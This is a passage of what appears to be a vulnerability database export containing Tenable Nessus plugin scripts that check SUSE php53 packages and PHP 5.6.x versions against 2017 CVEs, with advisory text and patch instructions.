missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php53 fixes the several issues. These security issues\nwere fixed :\n\n - CVE-2017-12933: The finish_nested_data function in\n ext/standard/var_unserializer.re was prone to a buffer\n over-read while unserializing untrusted data.\n Exploitation of this issue could have had an unspecified\n impact on the integrity of PHP (bsc#1054430).\n\n - CVE-2017-11628: Stack-based buffer overflow in the\n zend_ini_do_op() function in Zend/zend_ini_parser.c\n could have caused a denial of service or potentially\n allowed executing code (bsc#1050726).\n\n - CVE-2017-7890: The GIF decoding function\n gdImageCreateFromGifCtx in the GD Graphics Library did\n not zero colorMap arrays use. A specially crafted GIF\n image could use the uninitialized tables to read ~700\n bytes from the top of the stack, potentially disclosing\n sensitive information (bsc#1050241).\n\n - CVE-2016-5766: Integer overflow in the _gd2GetHeader in\n the GD Graphics Library (aka libgd) allowed remote\n attackers to cause a denial of service (heap-based\n buffer overflow and application crash) or possibly have\n unspecified other impact via crafted chunk dimensions in\n an image (bsc#986386).\n\n - CVE-2017-11145: An error in the date extension's\n timelib_meridian parsing code could have been used by\n attackers able to supply date strings to leak\n information from the interpreter, related to\n ext/date/lib/parse_date.c out-of-bounds reads affecting\n the php_parse_date function (bsc#1048112).\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could have lead to\n information leak [bsc#1048111]\n\n - CVE-2016-10397: Incorrect handling of various URI\n components in the URL parser could have been used by\n attackers to bypass hostname-specific URL checks\n (bsc#1047454).\n\n - CVE-2017-11147: The PHAR archive handler could have been\n used by attackers supplying malicious archive files to\n crash the PHP interpreter or potentially disclose\n information due to a buffer over-read in the\n phar_parse_pharfile function (bsc#1048094).\n\n - CVE-2017-11144: The openssl extension PEM sealing code\n did not check the return value of the OpenSSL sealing\n function, which could have lead to a crash of the PHP\n interpreter (bsc#1048096).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047454\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=986386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10168/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10397/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5766/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11144/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11145/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11146/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11147/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11628/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12933/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7890/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172522-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cf3f2ab3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-php53-13282=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-php53-13282=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-php53-13282=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"apache2-mod_php53-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-bcmath-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-bz2-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-calendar-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ctype-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-curl-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-dba-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-dom-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-exif-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-fastcgi-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-fileinfo-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ftp-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gd-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gettext-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gmp-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-iconv-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-intl-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-json-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ldap-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mbstring-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mcrypt-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mysql-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-odbc-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-openssl-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pcntl-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pdo-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pear-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pgsql-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pspell-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-shmop-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-snmp-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-soap-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-suhosin-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvmsg-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvsem-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvshm-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-tokenizer-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-wddx-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlreader-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlrpc-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlwriter-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xsl-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-zip-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-zlib-5.3.17-112.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T05:22:11", "description": "According to its banner, the version of PHP running on the remote web\nserver is 5.6.x prior to 5.6.31. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - An out-of-bounds read error exists in the PCRE library\n in the compile_bracket_matchingpath() function within\n file pcre_jit_compile.c. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n regular expression, to crash a process linked to the\n library, resulting in a denial of service condition.\n (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics\n Library (LibGD) in the gdImageCreateFromGifCtx()\n function within file gd_gif_in.c when handling a\n specially crafted GIF file. An unauthenticated, remote\n attacker can exploit this to disclose sensitive memory\n contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the\n match_at() function within file regexec.c. An\n unauthenticated, remote attacker can exploit this to\n disclose sensitive memory contents or crash a process\n linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the\n next_state_val() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the\n mbc_enc_len() function within file utf8.c. An\n unauthenticated, remote attacker can exploit this to\n disclose memory contents or crash a process linked to\n the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the\n bitset_set_range() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma\n in the left_adjust_char_head() function within file\n regexec.c during regular expression compilation. An\n unauthenticated, remote attacker can exploit this to\n crash a process linked to the library, resulting in a\n denial of service condition. (CVE-2017-9229)\n\n - A denial of service condition exists in PHP when\n handling overlarge POST requests. An unauthenticated,\n remote attacker can exploit this to exhaust available\n CPU resources. (CVE-2017-11142)\n\n - An extended invalid free error exists in PHP in the\n php_wddx_push_element() function within file\n ext/wddx/wddx.c when parsing empty boolean tags.\n An unauthenticated, remote attacker can exploit this to\n cause a denial of service condition. (CVE-2017-11143)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function\n within file crypto/evp/p_seal.c due to returning an\n undocumented value of '-1'. An unauthenticated, remote\n attacker can exploit this to cause an unspecified\n impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the\n php_parse_date() function within file\n ext/date/lib/parse_date.c. An unauthenticated, remote\n attacker can exploit this to disclose memory contents or\n cause a denial of service condition.\n (CVE-2017-11145)\n\n - An out-of-bounds read error exists in PHP in the\n finish_nested_data() function within file\n ext/standard/var_unserializer.re. An unauthenticated,\n remote attacker can exploit this to disclose memory\n contents or cause a denial of service condition.\n\n - An off-by-one overflow condition exists in PHP in the\n INI parsing API, specifically in the zend_ini_do_op()\n function within file Zend/zend_ini_parser.y, due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code.\n\n - A Heap buffer overread flaw in finish_nested_data\n while unserializing untrusted data could lead to an\n unspecified impact on the integrity of PHP.\n (CVE-2017-12933)\n\n - A stack-based buffer overflow in the zend_ini_do_op()\n function in Zend/zend_ini_parser.c could cause a denial\n of service or potentially allow executing code.\n (CVE-2017-11628)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 37, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-13T00:00:00", "title": "PHP 5.6.x < 5.6.31 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9224", "CVE-2017-12933", "CVE-2017-9228", "CVE-2017-9226", "CVE-2017-11143", "CVE-2017-9229", "CVE-2017-9227", "CVE-2017-11628", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142", "CVE-2017-6004"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_6_31.NASL", "href": "https://www.tenable.com/plugins/nessus/101525", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101525);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/03/04 18:17:59\");\n\n script_cve_id(\n \"CVE-2017-6004\",\n \"CVE-2017-7890\",\n \"CVE-2017-9224\",\n \"CVE-2017-9226\",\n \"CVE-2017-9227\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2017-11142\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n \"CVE-2017-11145\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\"\n );\n script_bugtraq_id(\n 96295,\n 99489,\n 99490,\n 99492,\n 99501,\n 99550,\n 99553,\n 99601,\n 99605,\n 100320,\n 100538,\n 101244\n );\n\n script_name(english:\"PHP 5.6.x < 5.6.31 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 5.6.x prior to 5.6.31. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - An out-of-bounds read error exists in the PCRE library\n in the compile_bracket_matchingpath() function within\n file pcre_jit_compile.c. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n regular expression, to crash a process linked to the\n library, resulting in a denial of service condition.\n (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics\n Library (LibGD) in the gdImageCreateFromGifCtx()\n function within file gd_gif_in.c when handling a\n specially crafted GIF file. An unauthenticated, remote\n attacker can exploit this to disclose sensitive memory\n contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the\n match_at() function within file regexec.c. An\n unauthenticated, remote attacker can exploit this to\n disclose sensitive memory contents or crash a process\n linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the\n next_state_val() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the\n mbc_enc_len() function within file utf8.c. An\n unauthenticated, remote attacker can exploit this to\n disclose memory contents or crash a process linked to\n the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the\n bitset_set_range() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma\n in the left_adjust_char_head() function within file\n regexec.c during regular expression compilation. An\n unauthenticated, remote attacker can exploit this to\n crash a process linked to the library, resulting in a\n denial of service condition. (CVE-2017-9229)\n\n - A denial of service condition exists in PHP when\n handling overlarge POST requests. An unauthenticated,\n remote attacker can exploit this to exhaust available\n CPU resources. (CVE-2017-11142)\n\n - An extended invalid free error exists in PHP in the\n php_wddx_push_element() function within file\n ext/wddx/wddx.c when parsing empty boolean tags.\n An unauthenticated, remote attacker can exploit this to\n cause a denial of service condition. (CVE-2017-11143)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function\n within file crypto/evp/p_seal.c due to returning an\n undocumented value of '-1'. An unauthenticated, remote\n attacker can exploit this to cause an unspecified\n impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the\n php_parse_date() function within file\n ext/date/lib/parse_date.c. An unauthenticated, remote\n attacker can exploit this to disclose memory contents or\n cause a denial of service condition.\n (CVE-2017-11145)\n\n - An out-of-bounds read error exists in PHP in the\n finish_nested_data() function within file\n ext/standard/var_unserializer.re. An unauthenticated,\n remote attacker can exploit this to disclose memory\n contents or cause a denial of service condition.\n\n - An off-by-one overflow condition exists in PHP in the\n INI parsing API, specifically in the zend_ini_do_op()\n function within file Zend/zend_ini_parser.y, due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code.\n\n - A Heap buffer overread flaw in finish_nested_data\n while unserializing untrusted data could lead to an\n unspecified impact on the integrity of PHP.\n (CVE-2017-12933)\n\n - A stack-based buffer overflow in the zend_ini_do_op()\n function in Zend/zend_ini_parser.c could cause a denial\n of service or potentially allow executing code.\n (CVE-2017-11628)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\"\n);\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.6.31\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.6.31 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9224\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nfix = \"5.6.31\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-10T17:25:45", "description": "The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of PHP :\n\n - An out-of-bounds read error exists in the PCRE library\n in the compile_bracket_matchingpath() function within\n file pcre_jit_compile.c. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n regular expression, to crash a process linked to the\n library, resulting in a denial of service condition.\n (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics\n Library (LibGD) in the 